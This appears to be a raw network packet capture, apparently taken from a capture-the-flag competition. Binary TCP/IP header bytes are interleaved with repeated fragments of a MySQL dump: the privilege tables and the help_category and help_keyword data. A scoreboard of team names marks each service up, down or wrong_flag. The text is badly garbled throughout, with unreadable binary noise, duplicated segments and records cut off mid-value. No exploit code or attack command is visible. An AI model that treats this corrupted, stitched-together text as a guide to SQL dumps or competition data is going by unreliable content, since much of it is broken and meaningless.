^(0VANK87k29MwJQH7At3w==','38013336'),(176673111,'od5Yirm8ODf',5242,'MTNzEwEJAAUA5oFnkzgnkNkq7F0s0L8LV96DyQ==','9326577'),(463685755,'pNyET1r6vzN',641,'MTNzEwEJAAaBPW6A2Oxsz2XOTqlvsOnMHXg2hA==','10114519'),(238615315,'3Mq37E',4022,'MTNzEwEJAAdyOSo3XMc1ITc9ddyFS7UTn12YBg==','16521933'),(285264492,'k0ki7R5g',1093,'MTNzEwEJAAjGdJRTYDiMF/BBFPxz3CP+SA6MTg==','32386250'),(641783464,'yxE89dH',1676,'MTNzEwEJAAnhtsyB3wJSxnuM+ynGzlrSjkDHqw==','38208728'),(949715177,'BVLXgaj75',5314,'MTNzEwEJAArKsRxWWIXBUN2eFWTyNLAWBKW1zQ==','20072295'),(732227231,'0ZlxS4ZU1',3447,'MTNzEwEJAAtYe3c1yxxc72QXnhq+X/kC4Qqhew==','11694143'),(504407636,'p1Ug3Hu',3843,'MTNzEwEJAAwPiXAT/JPanv0mKSxwT2BCI+P0Jg==','17047898'),(404437870,'uLJhGvUkz',3082,'MTNzEwEJAA1sxgv8O57qqGPEt2ajsWM3ebT2Qg==','20153709'),(812644847,'F2TiPf8i',2781,'MTNzEwEJAA5F1O61QQAVaDdm5XNw9OW8WF16nA==','28999081'),(517407076,'1LD8OUm2hif',1156,'MTNzEwEJAA/VO/37pWQ8O4ZYFQHeeYnB8ZE0QA==','16648123'),(441023104,'MdtY0SI0D',265,'MTNzEwEJABDFtjAemjoL5OhClSvHAdnFiHFQ4w==','33392972'),(274594953,'ARdKK38epQ',2516,'MTNzEwEJABFB6yQOxW9Ii0BuqNopAClTlwo2Tg==','28592321'),(537787396,'WlJ5hgG',2071,'MTNzEwEJABL3Jl1LJdstdnlbQAL+WEoDLKAJVw==','11093054'),(472272483,'1fATwckq36',1981,'MTNzEwEJABNNV6v6PDzfODq1nrYXnirCL2wCqA==','9159069'),(276522540,'iFCyZZ0`BiEL@/o0˃2E4@@  ֞Pg%;"l_ cmPCyZZ0`BiEL@/go0AE4\@@` 3 Pu}UB$ )C*~bbBi0`ET@/p܂Ao0E<@?x  3P tj  (` ENABLE KEYS */; -- -- Current Database: `deleteme` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `deleteme` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `deleteme`; -- -- Current Database: `mysql` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `mysql` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `mysql`; -- -- Table structure for table `columns_priv` -- DROP TABLE IF EXISTS `columns_priv`; CREATE TABLE `columns_priv` ( `Host` char(60) character set latin1 collate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT NULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Table_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Column_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Timestamp` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, `Column_priv` set('Select','Insert','Update','References') NOT NULL default '', PRIMARY KEY (`Host`,`Db`,`User`,`Table_name`,`Column_name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Column privileges'; -- -- Dumping data for table `columns_priv` -- /*!40000 ALTER TABLE `columns_priv` DISABLE KEYS */; LOCK TABLES `columns_priv` WRITE; UNLOCK TABLES;C2~ZZBi0`EL@/܂Sŀo0E4\!@?^ 3 Pu}UL$$ )CA~bb0`BiET@/Ԁo0SE<@@w  3P tj  (` ENABLE KEYS */; -- -- Current Database: `deleteme` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `deleteme` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `deleteme`; -- -- Current Database: `mysql` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `mysql` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `mysql`; -- -- Table structure for table `columns_priv` -- DROP TABLE IF EXISTS `columns_priv`; CREATE TABLE `columns_priv` ( `Host` char(60) character set latin1 collate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT NULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Table_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Column_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Timestamp` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, `Column_priv` set('Select','Insert','Update','References') NOT NULL default '', PRIMARY KEY (`Host`,`Db`,`User`,`Table_name`,`Column_name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Column privileges'; -- -- Dumping data for table `columns_priv` -- /*!40000 ALTER TABLE `columns_priv` DISABLE KEYS */; LOCK TABLES `columns_priv` WRITE; UNLOCK TABLES;CL~ZZ0`BiEL@/go0AE4\!@@^ 3 Pu}UL$$ )CbbBi0`ET@/p܂Ao0E<@?x  3Ptj  ) /*!40000 ALTER TABLE `columns_priv` ENABLE KEYS */; -- -- Table structure for table `db` -- DROP TABLE IF EXISTS `db`; CREATE TABLE `db` ( `Host` char(60) character set latin1 collate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT NULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Select_priv` enum('N','Y') NOT NULL default 'N', `Insert_priv` enum('N','Y') NOT NULL default 'N', `Update_priv` enum('N','Y') NOT NULL default 'N', `Delete_priv` enum('N','Y') NOT NULL default 'N', `Create_priv` enum('N','Y') NOT NULL default 'N', `Drop_priv` enum('N','Y') NOT NULL default 'N', `Grant_priv` enum('N','Y') NOT NULL default 'N', `References_priv` enum('N','Y') NOT NULL default 'N', `Index_priv` enum('N','Y') NOT NULL default 'N', `Alter_priv` enum('N','Y') NOT NULL default 'N', `Create_tmp_table_priv` enum('N','Y') NOT NULL default 'N', `Lock_tables_priv` enum('N','Y') NOT NULL default 'N', PRIMARY KEY (`Host`,`Db`,`User`), KEY `User` (`User`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Database privileges'; -- -- Dumping data for table `db` -- /*!40000 ALTER TABLE `db` DISABLE KEYS */; LOCK TABLES `db` WRITE; INSERT INTO `db` VALUES ('%','test','Cbb0`BiET@/Ԁo0SE<@@w  3Ptj  ) /*!40000 ALTER TABLE `columns_priv` ENABLE KEYS */; -- -- Table structure for table `db` -- DROP TABLE IF EXISTS `db`; CREATE TABLE `db` ( `Host` char(60) character set latin1 collate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT NULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Select_priv` enum('N','Y') NOT NULL default 'N', `Insert_priv` enum('N','Y') NOT NULL default 'N', `Update_priv` enum('N','Y') NOT NULL default 'N', `Delete_priv` enum('N','Y') NOT NULL default 'N', `Create_priv` enum('N','Y') NOT NULL default 'N', `Drop_priv` enum('N','Y') NOT NULL default 'N', `Grant_priv` enum('N','Y') NOT NULL default 'N', `References_priv` enum('N','Y') NOT NULL default 'N', `Index_priv` enum('N','Y') NOT NULL default 'N', `Alter_priv` enum('N','Y') NOT NULL default 'N', `Create_tmp_table_priv` enum('N','Y') NOT NULL default 'N', `Lock_tables_priv` enum('N','Y') NOT NULL default 'N', PRIMARY KEY (`Host`,`Db`,`User`), KEY `User` (`User`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Database privileges'; -- -- Dumping data for table `db` -- /*!40000 ALTER TABLE `db` DISABLE KEYS */; LOCK TABLES `db` WRITE; INSERT INTO `db` VALUES ('%','test','CZZBi0`EL@/Ao0E4@?  ֞Pg%F"lT cmSCZZ0`BiEL@/o0˃2E4@@  ֞Pg%F"lT cmSCZZBiʪEL@/o0oo0E4|t@@ YP*+$l-0 7=wG3 up
7 - The Tower of Hanoi down up up up down down up up up up up up down
8 - We_0wn_Y0u down up up up up up up up 7 up 7,10 up up up up
9 - 0ld Eur0pe down up up up up up down up 7 up up up up up
10 - Brooklyn Overflow down down up 18 up down up 9,4 up up 7 up up up up up
11 - U C Lions up down up up up up 9 up down up
7 - The Tower of Hanoi down up up up down down up up up up up up down
8 - We_0wn_Y0u down up up up up up up up 7 up 7,10 up up up up
9 - 0ld Eur0pe down up up up up up down up 7 up up up up up
10 - Brooklyn Overflow down down up 18 up down up 9,4 up up 7 up up up up up
11 - U C Lions up down up up up up 9 up down up up up up
12 - WCSC down up wrong_flag 18 up up up 9 down down up 11 up up up up
13 - Felons of Troy down up 9,7,8 wrong_flag 18 up up up up up 18 up 18,4 up up up up
14 - Cult of the Living Dead down down down down down down down down down down down down down
15 - Team Georgia Tech World Police down up wrong_flag 18 up up up 9 up up up 7,10 up up up up
16 - int80 down up 9,7,8 wrong_flag 18,7 up up up up up 18,7 up 18,4 up up up up
17 - SYPER down up 9,8wrong_flag up up up up
12 - WCSC down up wrong_flag 18 up up up 9 down down up 11 up up up up
13 - Felons of Troy down up 9,7,8 wrong_flag 18 up up up up up 18 up 18,4 up up up up
14 - Cult of the Living Dead down down down down down down down down down down down down down
15 - Team Georgia Tech World Police down up wrong_flag 18 up up up 9 up up up 7,10 up up up up
16 - int80 down up 9,7,8 wrong_flag 18,7 up up up up up 18,7 up 18,4 up up up up
17 - SYPER down up 9,8 down 18 up up up 9 up up 7,18 up 18 up up up down
18 - Chocolate Makers wrong_flag up up down up up 9 down down down up up up down
19 - f0gd0gs down up 7,9 wrong_flag 18,7 up up up 9 up up 7 wrong_flag up up up up
20 - Cheddar Horsemen down up 7,8 wrong_flag 18 up up up up up up 7 up up up up
21 - W0lfhac|<3r5 down up 7,8,9 wrong_flag 18 up up up 9 up up 18 up 10,18,4 up up up up
22 - The Graham Crackers down up 7,8 wrong_flag 18 up up up 9 up up 18,7 up 9,10,18 up up down 18 up up up 9 up up 7,18 up 18 up up up down
18 - Chocolate Makers wrong_flag up up down up up 9 down down down up up up down
19 - f0gd0gs down up 7,9 wrong_flag 18,7 up up up 9 up up 7 wrong_flag up up up up
20 - Cheddar Horsemen down up 7,8 wrong_flag 18 up up up up up up 7 up up up up
21 - W0lfhac|<3r5 down up 7,8,9 wrong_flag 18 up up up 9 up up 18 up 10,18,4 up up up up
22 - The Graham Crackers down up 7,8 wrong_flag 18 up up up 9 up up 18,7 up 9,10,18 up up up up
Scoring Round 61 61 61 61 61 61 61 61 61 61 61 61 61
CNNBaBiE@@/ro0o0 E(|z@@ YP,:+$l R 7=wG3up up Scoring Round 61 61 61 61 61 61 61 61 61 61 61 61 61 CZZBi0`EL@/܂Sŀo0E4\#@?\ 3 Pu}UV4$q )CZZBiBaEL@/fo0 o0E4@)u Y P+$l"* G37=wCZZ0`BiEL@/go0AE4\#@@\ 3 Pu}UV4$q )CZZʪBiEL@/o0o0oE4@@u Y P+$l"* G37=wC\ZZBiBaEL@/fo0 o0E4@)s Y P+$l'2Hg G37=wCmZZʪBiEL@/o0o0oE4@@s Y P+$l'2Hg G37=wCۊbbBi0`ET@/p܂Ao0E<@?x  3Ptj  ) `help_category` ( `help_category_id` smallint(5) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', `parent_category_id` smallint(5) unsigned default NULL, `url` varchar(128) NOT NULL default '', PRIMARY KEY (`help_category_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help categories'; -- -- Dumping data for table `help_category` -- /*!40000 ALTER TABLE `help_category` DISABLE KEYS */; LOCK TABLES `help_category` WRITE; INSERT INTO `help_category` VALUES (0,'Polygon properties',24,''),(1,'Column Types',15,''),(2,'Geometry constructors',24,''),(3,'WKT',24,''),(4,'Numeric Functions',22,''),(5,'GeometryCollection properties',24,''),(6,'Data Manipulation',15,''),(7,'Administration',15,''),(8,'MBR',24,''),(9,'Control flow functions',22,''),(10,'Transactions',15,''),(11,'Geometry relations',24,''),(12,'Functions and Modifiers for Use with GROUP BY Clauses',22,''),(13,'WKB',24,''),(14,'Date and Time Functions',22,''),(15,'Contents',0,''),(16,'Point properties',24,''),(17,'Encryption Functions',22,''),(18,'LineString properties',24,''),(19,'Geometry properties',24,''),(20,'Logical operators',22,''),(21,'Miscellaneous Functions',22,''),(22,'Functions',15,''),(23,'String Functions',22,''),(24,'Geographic feaCBi0`E@/uXAo0E@?};  3Ptj  )tures',15,''),(25,'Information Functions',22,''),(26,'Comparison operators',22,''),(27,'Bit Functions',22,''),(28,'Data Definition',15,''); CZZBiBaEL@/fo0 o0E4@)q Y P+$l,:̿ G37=wCbb0`BiET@/Ԁo0SE<@@w  3Ptj  ) `help_category` ( `help_category_id` smallint(5) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', `parent_category_id` smallint(5) unsigned default NULL, `url` varchar(128) NOT NULL default '', PRIMARY KEY (`help_category_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help categories'; -- -- Dumping data for table `help_category` -- /*!40000 ALTER TABLE `help_category` DISABLE KEYS */; LOCK TABLES `help_category` WRITE; INSERT INTO `help_category` VALUES (0,'Polygon properties',24,''),(1,'Column Types',15,''),(2,'Geometry constructors',24,''),(3,'WKT',24,''),(4,'Numeric Functions',22,''),(5,'GeometryCollection properties',24,''),(6,'Data Manipulation',15,''),(7,'Administration',15,''),(8,'MBR',24,''),(9,'Control flow functions',22,''),(10,'Transactions',15,''),(11,'Geometry relations',24,''),(12,'Functions and Modifiers for Use with GROUP BY Clauses',22,''),(13,'WKB',24,''),(14,'Date and Time Functions',22,''),(15,'Contents',0,''),(16,'Point properties',24,''),(17,'Encryption Functions',22,''),(18,'LineString properties',24,''),(19,'Geometry properties',24,''),(20,'Logical operators',22,''),(21,'Miscellaneous Functions',22,''),(22,'Functions',15,''),(23,'String Functions',22,''),(24,'Geographic feaC0`BiE@/Po0SE@@|;  3Ptj  )tures',15,''),(25,'Information Functions',22,''),(26,'Comparison operators',22,''),(27,'Bit Functions',22,''),(28,'Data Definition',15,''); C ZZʪBiEL@/o0o0oE4@@q Y P+$l,:̿ G37=wC9bbBi0`ET@/p܂Ao0E<@?x  3P+tj + )UNLOCK TABLES; /*!40000 ALTER TABLE `help_category` ENABLE KEYS */; -- -- Table structure for table `help_keyword` -- DROP TABLE IF EXISTS `help_keyword`; CREATE TABLE `help_keyword` ( `help_keyword_id` int(10) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', PRIMARY KEY (`help_keyword_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help keywords'; -- -- Dumping data for table `help_keyword` -- /*!40000 ALTER TABLE `help_keyword` DISABLE KEYS */; LOCK TABLES `help_keyword` WRITE; INSERT INTO `help_keyword` VALUES (0,'MIN'),(1,'JOIN'),(2,'SERIALIZABLE'),(3,'REPLACE'),(4,'RETURNS'),(5,'MASTER_SSL_CA'),(6,'NCHAR'),(7,'COLUMNS'),(8,'WORK'),(9,'DATETIME'),(10,'MODE'),(11,'OPEN'),(12,'INTEGER'),(13,'ESCAPE'),(14,'VALUE'),(15,'GEOMETRYCOLLECTIONFROMWKB'),(16,'DROP'),(17,'SQL_BIG_RESULT'),(18,'EVENTS'),(19,'MONTH'),(20,'REGEXP'),(21,'DUPLICATE'),(22,'LINESTRINGFROMTEXT.'),(23,'UNLOCK'),(24,'INNODB'),(25,'YEAR_MONTH'),(26,'LOCK'),(27,'NDB'),(28,'CHECK'),(29,'FULL'),(30,'INT4'),(31,'BY'),(32,'NO'),(33,'MINUTE'),(34,'DATA'),(35,'DAY'),(36,'RAID_CHUNKSIZE'),(37,'SHARE'),(38,'REAL'),(39,'SEPARATOR'),(40,'DELETE'),(41,'ON'),(42,'CHANGED'),(43,'CLOSE'),(44,'USE'),(45,'WHERE'),(46,'SPATIAL'),(47,'SQL_BUFFER_RESULT'),(CLbb0`BiET@/Ԁo0SE<@@w  3P+tj + )UNLOCK TABLES; /*!40000 ALTER TABLE `help_category` ENABLE KEYS */; -- -- Table structure for table `help_keyword` -- DROP TABLE IF EXISTS `help_keyword`; CREATE TABLE `help_keyword` ( `help_keyword_id` int(10) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', PRIMARY KEY (`help_keyword_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help keywords'; -- -- Dumping data for table `help_keyword` -- /*!40000 ALTER TABLE `help_keyword` DISABLE KEYS */; LOCK TABLES `help_keyword` WRITE; INSERT INTO `help_keyword` VALUES (0,'MIN'),(1,'JOIN'),(2,'SERIALIZABLE'),(3,'REPLACE'),(4,'RETURNS'),(5,'MASTER_SSL_CA'),(6,'NCHAR'),(7,'COLUMNS'),(8,'WORK'),(9,'DATETIME'),(10,'MODE'),(11,'OPEN'),(12,'INTEGER'),(13,'ESCAPE'),(14,'VALUE'),(15,'GEOMETRYCOLLECTIONFROMWKB'),(16,'DROP'),(17,'SQL_BIG_RESULT'),(18,'EVENTS'),(19,'MONTH'),(20,'REGEXP'),(21,'DUPLICATE'),(22,'LINESTRINGFROMTEXT.'),(23,'UNLOCK'),(24,'INNODB'),(25,'YEAR_MONTH'),(26,'LOCK'),(27,'NDB'),(28,'CHECK'),(29,'FULL'),(30,'INT4'),(31,'BY'),(32,'NO'),(33,'MINUTE'),(34,'DATA'),(35,'DAY'),(36,'RAID_CHUNKSIZE'),(37,'SHARE'),(38,'REAL'),(39,'SEPARATOR'),(40,'DELETE'),(41,'ON'),(42,'CHANGED'),(43,'CLOSE'),(44,'USE'),(45,'WHERE'),(46,'SPATIAL'),(47,'SQL_BUFFER_RESULT'),(C2ZZBi0`EL@/Ao0E4@?  ֞Pg%P"lJ cmSCDZZ0`BiEL@/o0˃2E4@@  ֞Pg%P"lJ cmSCbbBi0`ET@/p܂Ao0E<@?x  3P$3tj ^ )48,'IGNORE'),(49,'QUICK'),(50,'SIGNED'),(51,'FALSE'),(52,'POLYGONFROMWKB'),(53,'NDBCLUSTER'),(54,'LEVEL'),(55,'FORCE'),(56,'BINARY'),(57,'TO'),(58,'CHANGE'),(59,'HOUR_MINUTE'),(60,'UPDATE'),(61,'INTO'),(62,'FEDERATED'),(63,'VARYING'),(64,'HOUR_SECOND'),(65,'VARIABLE'),(66,'ROLLBACK'),(67,'MAX'),(68,'RTREE'),(69,'PROCEDURE'),(70,'TIMESTAMP'),(71,'IMPORT'),(72,'AGAINST'),(73,'CHECKSUM'),(74,'INSERT'),(75,'COUNT'),(76,'LONGBINARY'),(77,'THEN'),(78,'ENGINES'),(79,'DAY_SECOND'),(80,'EXISTS'),(81,'BOOLEAN'),(82,'DEFAULT'),(83,'MOD'),(84,'TYPE'),(85,'NO_WRITE_TO_BINLOG'),(86,'RESET'),(87,'BIGINT'),(88,'SET'),(89,'DATE'),(90,'STATUS'),(91,'FULLTEXT'),(92,'COMMENT'),(93,'MASTER_CONNECT_RETRY'),(94,'INNER'),(95,'STOP'),(96,'MASTER_LOG_FILE'),(97,'MRG_MYISAM'),(98,'PRECISION'),(99,'TRAILING'),(100,'LONG'),(101,'ELSE'),(102,'IO_THREAD'),(103,'FROM'),(104,'READ'),(105,'LEFT'),(106,'MINUTE_SECOND'),(107,'COMPACT'),(108,'DEC'),(109,'FOR'),(110,'WARNINGS'),(111,'MIN_ROWS'),(112,'STRING'),(113,'FUNCTION'),(114,'ENCLOSED'),(115,'AGGREGATE'),(116,'FIELDS'),(117,'INT3'),(118,'ARCHIVE'),(119,'AVG_ROW_LENGTH'),(120,'ADD'),(121,'FLOAT4'),(122,'STRIPED'),(123,'VIEW'),(124,'REPEATABLE'),(125,'INFILE'),(126,'ORDER'),(127,'USING'),(128,'MIDDLEINT'),(129,'UNSIGNED'),(130,'GEOMETRYFROMTEXT'),(131Cbb0`BiET@/Ԁo0SE<@@w  3P$3tj ^ )48,'IGNORE'),(49,'QUICK'),(50,'SIGNED'),(51,'FALSE'),(52,'POLYGONFROMWKB'),(53,'NDBCLUSTER'),(54,'LEVEL'),(55,'FORCE'),(56,'BINARY'),(57,'TO'),(58,'CHANGE'),(59,'HOUR_MINUTE'),(60,'UPDATE'),(61,'INTO'),(62,'FEDERATED'),(63,'VARYING'),(64,'HOUR_SECOND'),(65,'VARIABLE'),(66,'ROLLBACK'),(67,'MAX'),(68,'RTREE'),(69,'PROCEDURE'),(70,'TIMESTAMP'),(71,'IMPORT'),(72,'AGAINST'),(73,'CHECKSUM'),(74,'INSERT'),(75,'COUNT'),(76,'LONGBINARY'),(77,'THEN'),(78,'ENGINES'),(79,'DAY_SECOND'),(80,'EXISTS'),(81,'BOOLEAN'),(82,'DEFAULT'),(83,'MOD'),(84,'TYPE'),(85,'NO_WRITE_TO_BINLOG'),(86,'RESET'),(87,'BIGINT'),(88,'SET'),(89,'DATE'),(90,'STATUS'),(91,'FULLTEXT'),(92,'COMMENT'),(93,'MASTER_CONNECT_RETRY'),(94,'INNER'),(95,'STOP'),(96,'MASTER_LOG_FILE'),(97,'MRG_MYISAM'),(98,'PRECISION'),(99,'TRAILING'),(100,'LONG'),(101,'ELSE'),(102,'IO_THREAD'),(103,'FROM'),(104,'READ'),(105,'LEFT'),(106,'MINUTE_SECOND'),(107,'COMPACT'),(108,'DEC'),(109,'FOR'),(110,'WARNINGS'),(111,'MIN_ROWS'),(112,'STRING'),(113,'FUNCTION'),(114,'ENCLOSED'),(115,'AGGREGATE'),(116,'FIELDS'),(117,'INT3'),(118,'ARCHIVE'),(119,'AVG_ROW_LENGTH'),(120,'ADD'),(121,'FLOAT4'),(122,'STRIPED'),(123,'VIEW'),(124,'REPEATABLE'),(125,'INFILE'),(126,'ORDER'),(127,'USING'),(128,'MIDDLEINT'),(129,'UNSIGNED'),(130,'GEOMETRYFROMTEXT'),(131CbbBi0`ET@/p܂Ao0E<@?x  3P);tj /x ),'INDEXES'),(132,'FOREIGN'),(133,'CACHE'),(134,'HOSTS'),(135,'COMMIT'),(136,'SCHEMAS'),(137,'LEADING'),(138,'LOAD'),(139,'SQL_CACHE'),(140,'CONVERT'),(141,'DYNAMIC'),(142,'POLYGONFROMTEXT'),(143,'BYTE'),(144,'LINESTRINGFROMWKB'),(145,'GLOBAL'),(146,'BERKELEYDB'),(147,'WHEN'),(148,'HAVING'),(149,'AS'),(150,'STARTING'),(151,'AUTOCOMMIT'),(152,'GRANTS'),(153,'OUTER'),(154,'FLOOR'),(155,'AFTER'),(156,'STD'),(157,'DISABLE'),(158,'CSV'),(159,'OUTFILE'),(160,'LOW_PRIORITY'),(161,'BDB'),(162,'SCHEMA'),(163,'SONAME'),(164,'POW'),(165,'MULTIPOINTFROMWKB'),(166,'INDEX'),(167,'MULTIPOINTFROMTEXT'),(168,'BACKUP'),(169,'MULTILINESTRINGFROMWKB'),(170,'EXTENDED'),(171,'CROSS'),(172,'NATIONAL'),(173,'GROUP'),(174,'ZEROFILL'),(175,'MASTER_PASSWORD'),(176,'RELAY_LOG_FILE'),(177,'TRUE'),(178,'CHARACTER'),(179,'MASTER_USER'),(180,'ENGINE'),(181,'TABLE'),(182,'INSERT_METHOD'),(183,'CASCADE'),(184,'RELAY_LOG_POS'),(185,'SQL_CALC_FOUND_ROWS'),(186,'MYISAM'),(187,'MODIFY'),(188,'MATCH'),(189,'MASTER_LOG_POS'),(190,'DESC'),(191,'DISTINCTROW'),(192,'TIME'),(193,'NUMERIC'),(194,'GEOMETRYCOLLECTIONFROMTEXT'),(195,'RAID_CHUNKS'),(196,'FLUSH'),(197,'CREATE'),(198,'ISAM'),(199,'INT2'),(200,'PROCESSLIST'),(201,'LOGS'),(202,'HEAP'),(203,'SOUNDS'),(204,'BETWEEN'),(205,'MULTILINESTRINGFROMTEXT'),(206,'PCbb0`BiET@/Ԁo0SE<@@w  3P);tj /x ),'INDEXES'),(132,'FOREIGN'),(133,'CACHE'),(134,'HOSTS'),(135,'COMMIT'),(136,'SCHEMAS'),(137,'LEADING'),(138,'LOAD'),(139,'SQL_CACHE'),(140,'CONVERT'),(141,'DYNAMIC'),(142,'POLYGONFROMTEXT'),(143,'BYTE'),(144,'LINESTRINGFROMWKB'),(145,'GLOBAL'),(146,'BERKELEYDB'),(147,'WHEN'),(148,'HAVING'),(149,'AS'),(150,'STARTING'),(151,'AUTOCOMMIT'),(152,'GRANTS'),(153,'OUTER'),(154,'FLOOR'),(155,'AFTER'),(156,'STD'),(157,'DISABLE'),(158,'CSV'),(159,'OUTFILE'),(160,'LOW_PRIORITY'),(161,'BDB'),(162,'SCHEMA'),(163,'SONAME'),(164,'POW'),(165,'MULTIPOINTFROMWKB'),(166,'INDEX'),(167,'MULTIPOINTFROMTEXT'),(168,'BACKUP'),(169,'MULTILINESTRINGFROMWKB'),(170,'EXTENDED'),(171,'CROSS'),(172,'NATIONAL'),(173,'GROUP'),(174,'ZEROFILL'),(175,'MASTER_PASSWORD'),(176,'RELAY_LOG_FILE'),(177,'TRUE'),(178,'CHARACTER'),(179,'MASTER_USER'),(180,'ENGINE'),(181,'TABLE'),(182,'INSERT_METHOD'),(183,'CASCADE'),(184,'RELAY_LOG_POS'),(185,'SQL_CALC_FOUND_ROWS'),(186,'MYISAM'),(187,'MODIFY'),(188,'MATCH'),(189,'MASTER_LOG_POS'),(190,'DESC'),(191,'DISTINCTROW'),(192,'TIME'),(193,'NUMERIC'),(194,'GEOMETRYCOLLECTIONFROMTEXT'),(195,'RAID_CHUNKS'),(196,'FLUSH'),(197,'CREATE'),(198,'ISAM'),(199,'INT2'),(200,'PROCESSLIST'),(201,'LOGS'),(202,'HEAP'),(203,'SOUNDS'),(204,'BETWEEN'),(205,'MULTILINESTRINGFROMTEXT'),(206,'PC~ZZBi0`EL@/Ao0E4@?  ֞Pg%Z/"l@ cmUCZZ0`BiEL@/o0˃2E4@@  ֞Pg%Z/"l@ cmUCxZZBi0`EL@/܂Sŀo0E4@?R 3 PZid  )^7CZZ0`BiEL@/o0  E4@@Q 3 PZid  )^7CfbbBi0`ET@/p܂Ao0E<@?x  3P.Ctj  )ACK_KEYS'),(207,'VALUES'),(208,'FAST'),(209,'VARCHARACTER'),(210,'SHOW'),(211,'ALL'),(212,'REDUNDANT'),(213,'USER_RESOURCES'),(214,'PARTIAL'),(215,'BINLOG'),(216,'END'),(217,'SECOND'),(218,'AND'),(219,'FLOAT8'),(220,'PREV'),(221,'HOUR'),(222,'SELECT'),(223,'DATABASES'),(224,'OR'),(225,'MASTER_SSL_CIPHER'),(226,'SQL_SLAVE_SKIP_COUNTER'),(227,'BOTH'),(228,'BOOL'),(229,'YEAR'),(230,'MASTER_PORT'),(231,'CONCURRENT'),(232,'UNIQUE'),(233,'MASTER_SSL'),(234,'DATE_ADD'),(235,'LIKE'),(236,'IN'),(237,'COLUMN'),(238,'DUMPFILE'),(239,'MEMORY'),(240,'CEIL'),(241,'QUERY'),(242,'MASTER_HOST'),(243,'LINES'),(244,'SQL_THREAD'),(245,'MULTIPOLYGONFROMWKB'),(246,'MASTER_SSL_CERT'),(247,'DAY_MINUTE'),(248,'TRANSACTION'),(249,'DATE_SUB'),(250,'GEOMETRYFROMWKB'),(251,'INT1'),(252,'RENAME'),(253,'RIGHT'),(254,'ALTER'),(255,'MAX_ROWS'),(256,'STRAIGHT_JOIN'),(257,'NATURAL'),(258,'VARIABLES'),(259,'ESCAPED'),(260,'SHA1'),(261,'RAID_TYPE'),(262,'CHAR'),(263,'OFFSET'),(264,'NEXT'),(265,'SQL_LOG_BIN'),(266,'ERRORS'),(267,'TEMPORARY'),(268,'SQL_SMALL_RESULT'),(269,'COMMITTED'),(270,'DELAY_KEY_WRITE'),(271,'BEGIN'),(272,'MEDIUM'),(273,'INTERVAL'),(274,'DAY_HOUR'),(275,'REFERENCES'),(276,'AES_ENCRYPT'),(277,'ISOLATION'),(278,'INT8'),(279,'RESTRICT'),(280,'IS'),(281,'UNCOMMITTED'),(282,'NOT'),(283,'DECmZZBi0`EL@/$T<o0E4@?A  Pկ8Ou  1TL7=vՌC~bb0`BiET@/Ԁo0SE<@@w  3P.Ctj  )ACK_KEYS'),(207,'VALUES'),(208,'FAST'),(209,'VARCHARACTER'),(210,'SHOW'),(211,'ALL'),(212,'REDUNDANT'),(213,'USER_RESOURCES'),(214,'PARTIAL'),(215,'BINLOG'),(216,'END'),(217,'SECOND'),(218,'AND'),(219,'FLOAT8'),(220,'PREV'),(221,'HOUR'),(222,'SELECT'),(223,'DATABASES'),(224,'OR'),(225,'MASTER_SSL_CIPHER'),(226,'SQL_SLAVE_SKIP_COUNTER'),(227,'BOTH'),(228,'BOOL'),(229,'YEAR'),(230,'MASTER_PORT'),(231,'CONCURRENT'),(232,'UNIQUE'),(233,'MASTER_SSL'),(234,'DATE_ADD'),(235,'LIKE'),(236,'IN'),(237,'COLUMN'),(238,'DUMPFILE'),(239,'MEMORY'),(240,'CEIL'),(241,'QUERY'),(242,'MASTER_HOST'),(243,'LINES'),(244,'SQL_THREAD'),(245,'MULTIPOLYGONFROMWKB'),(246,'MASTER_SSL_CERT'),(247,'DAY_MINUTE'),(248,'TRANSACTION'),(249,'DATE_SUB'),(250,'GEOMETRYFROMWKB'),(251,'INT1'),(252,'RENAME'),(253,'RIGHT'),(254,'ALTER'),(255,'MAX_ROWS'),(256,'STRAIGHT_JOIN'),(257,'NATURAL'),(258,'VARIABLES'),(259,'ESCAPED'),(260,'SHA1'),(261,'RAID_TYPE'),(262,'CHAR'),(263,'OFFSET'),(264,'NEXT'),(265,'SQL_LOG_BIN'),(266,'ERRORS'),(267,'TEMPORARY'),(268,'SQL_SMALL_RESULT'),(269,'COMMITTED'),(270,'DELAY_KEY_WRITE'),(271,'BEGIN'),(272,'MEDIUM'),